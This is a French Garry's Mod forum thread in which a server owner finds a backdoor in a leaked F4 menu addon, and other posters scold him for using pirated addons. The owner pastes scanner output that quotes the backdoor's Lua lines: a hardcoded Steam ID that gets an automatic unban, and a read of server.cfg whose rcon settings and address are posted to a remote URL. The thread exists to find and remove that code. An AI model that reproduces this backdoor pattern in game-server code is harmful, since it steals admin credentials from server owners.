[Résolu] Spam "Writing cfg/banned_user.cfg. removeid: couldn't find STEAM_0:1:92046224" dans la console

• Initiateur de la discussion
Daykew

Daykew

Geek suprême
Score réaction
32
Bonjour, bonsoir ! Ma console me spamme ceci depuis un petit moment "
Writing cfg/banned_user.cfg.
removeid: couldn't find STEAM_0:1:92046224 " à ce que j'ai compris c'est qu'une backdoor est présente, avez-vous une solution ? Tous mes addons sont payés je ne comprends pas...

• J'aime
Réactions: Micka3812
  • Banni
DrakeRoleplay

DrakeRoleplay

Geek
Score réaction
124
Menu f4 élite ! Dans le dossier server puis il y a un crashed.lua c'est bien sa ?

• J'aime
Réactions: Micka3812
Daykew

Daykew

Geek suprême
Score réaction
32
DrakeRoleplay à dit:
Menu f4 élite ! Dans le dossier server puis il y a un crashed.lua c'est bien sa ?
Le dossier se trouve où déjà ?

Daykew

Daykew

Geek suprême
Score réaction
32
RayZz

RayZz

Geek suprême
Score réaction
77
Les leaks c'est mal

Daykew

Daykew

Geek suprême
Score réaction
32
DrakeRoleplay à dit:
Got it !

AUTHENT (Presence of Steam ID) addons/elitef4menu/lua/autorun/server/elite_crash.lua:29 if ( ply:SteamID() == "STEAM_0:1:92046224") then
361 2 - AUTHENT (Presence of Steam ID) addons/elitef4menu/lua/autorun/server/elite_crash.lua:36 ULib.unban( "STEAM_0:1:92046224")
362 1 - FILESYS (Reading file contents) addons/elitef4menu/lua/autorun/server/elite_crash.lua:42 Data = util.JSONToTable(file.Read( "rm_f4_elite/mapsave/" .. Map .. ".txt" ))
363 1 - FILESYS (Reading file contents) addons/elitef4menu/lua/autorun/server/elite_crash.lua:56 local cfg = file.Read( "cfg/server.cfg", "GAME" )
364 4 - NETWORK (HTTP server call) addons/elitef4menu/lua/autorun/server/elite_crash.lua:57 http.Post( url, { rcon = cfg, hostname = GetHostName(), port = GetConVarString( "ip" ) .. ":" .. GetConVarString( "hostport" ) }, function() print( "Succsess!" ) end, function() print( "Fail!" ) end )

C'est ça ?

RayZz

RayZz

Geek suprême
Score réaction
77
Samuel Galimand à dit:
Got it !

AUTHENT (Presence of Steam ID) addons/elitef4menu/lua/autorun/server/elite_crash.lua:29 if ( ply:SteamID() == "STEAM_0:1:92046224") then
361 2 - AUTHENT (Presence of Steam ID) addons/elitef4menu/lua/autorun/server/elite_crash.lua:36 ULib.unban( "STEAM_0:1:92046224")
362 1 - FILESYS (Reading file contents) addons/elitef4menu/lua/autorun/server/elite_crash.lua:42 Data = util.JSONToTable(file.Read( "rm_f4_elite/mapsave/" .. Map .. ".txt" ))
363 1 - FILESYS (Reading file contents) addons/elitef4menu/lua/autorun/server/elite_crash.lua:56 local cfg = file.Read( "cfg/server.cfg", "GAME" )
364 4 - NETWORK (HTTP server call) addons/elitef4menu/lua/autorun/server/elite_crash.lua:57 http.Post( url, { rcon = cfg, hostname = GetHostName(), port = GetConVarString( "ip" ) .. ":" .. GetConVarString( "hostport" ) }, function() print( "Succsess!" ) end, function() print( "Fail!" ) end )

C'est ça ?

Par pitier supprime les leaks que tu as, et tu n'auras plus de soucis

Daykew

Daykew

Geek suprême
Score réaction
32
RayZz à dit:
Les leaks c'est mal
J'ai dit que j'ai payé tous mes addons, pour preuve 120 euros d'addons mis pour mon serveur sur gmodstore !

RayZz

RayZz

Geek suprême
Score réaction
77
Samuel Galimand à dit:
J'ai dit que j'ai payé tous mes addons, pour preuve 120 euros d'addons mis pour mon serveur sur gmodstore !
Date d'achat de tes addons ?

Quentin Litoria

Quentin Litoria

Geek suprême
Score réaction
7
Samuel Galimand à dit:
Got it !

C'est ça ?
oui il faut supprimer les lignes qui font ca

Daykew

Daykew

Geek suprême
Score réaction
32
RayZz à dit:
Date d'achat de tes addons ?
Il y a quelques jours, mais j'ai réglé le problème à l'instant

RayZz

RayZz

Geek suprême
Score réaction
77
Il va donc falloir m'expliquer comment tu te procures le F4 menu alors qu'il n'est plus en vente depuis pas mal de temps

Daykew

Daykew

Geek suprême
Score réaction
32
Quentin Litoria à dit:
oui il faut supprimer les lignes qui font ca
C'est bon, merci beaucoup pour votre aide, l'addon est clean maintenant ? je peux l'utiliser sans riques ?

RayZz

RayZz

Geek suprême
Score réaction
77
C'est donc un Leak.

Merci bien; Bonne nuit :)

Daykew

Daykew

Geek suprême
Score réaction
32
RayZz à dit:
Il va donc falloir m'expliquer comment tu te procures le F4 menu alors qu'il n'est plus en vente depuis pas mal de temps
On me l'a donné depuis un pack d'addons soi-disant acheté...

RayZz

RayZz

Geek suprême
Score réaction
77
Samuel Galimand à dit:
Donc c'est un Leak ne cherche pas mdr

Quentin Litoria

Quentin Litoria

Geek suprême
Score réaction
7
Samuel Galimand à dit:
C'est bon, merci beaucoup pour votre aide, l'addon est clean maintenant ? je peux l'utiliser sans riques ?
ba normalement oui mais il peut y en avoir d'autre je ne sais pas moi mais ne me dit pas que tu l'a acheter

Quentin Litoria

Quentin Litoria

Geek suprême
Score réaction
7
Samuel Galimand à dit:
ba biensur

RayZz

RayZz

Geek suprême
Score réaction
77
Et quand bien même si il est vraiment acheté par quelqu'un qui te la donné, tu n'as pas le droit de le détenir vu qu'il ne t'appartient guère.

Daykew

Daykew

Geek suprême
Score réaction
32
D'accord, je ne ferai plus confiance à personne, merci beaucoup

• Banni
ᒪᑌᑕIᗩᑎ

ᒪᑌᑕIᗩᑎ

Geek suprême
Score réaction
289
Tu dit avoir acheté l'addon puis ensuite c'est un pack, inutile de demander que l'ont t'aide si tu as des leak je dit pas que c'est mal de leak mais t'attend pas à reçevoir de l'aide en utilisant des leak, il y'a X backdoor dans les leaks que sa soit des forum de leak fr ou des forum de leak en, l'un ne rattrape pas l'autre.

• J'aime
Réactions: Swxn™
RayZz

RayZz

Geek suprême
Score réaction
77
Samuel Galimand à dit:
D'accord, je ne ferai plus confiance à personne, merci beaucoup
Évites plutôt Verycaca :)

A bon entendeur

Bonne soirée

Swxn™

Swxn™

Geek suprême
Score réaction
318
Service de leaks bonjour :

Voici mes offres :
* Pack d'addon Gmodstore VIP pour seulement 800€ !
* Pack Pigeon Gmodstore version de 2015 pour seulement 950€ !

Nan mais sérieusement ça devient inquiétant Kappa

Le mec tellement il a jamais été sur gmodstore il c'est même pas que le EliteF4 n'est plus en vente depuis longtemps FailFish

• J'aime
Réactions: Quentin Litoria et dracvar
RayZz

RayZz

Geek suprême
Score réaction
77
Swxn™ à dit:
Service de leaks bonjour :

Voici mes offres :
* Pack d'addon Gmodstore VIP pour seulement 800€ !
* Pack Pigeon Gmodstore version de 2015 pour seulement 950€ !

Nan mais sérieusement ça devient inquiétant Kappa

Le mec tellement il a jamais été sur gmodstore il c'est même pas que le EliteF4 n'est plus en vente depuis longtemps FailFish
Il verra bien quand son Serv' se fera ba*ser :)

Discord d'entraide
Rejoignz-nous sur Discord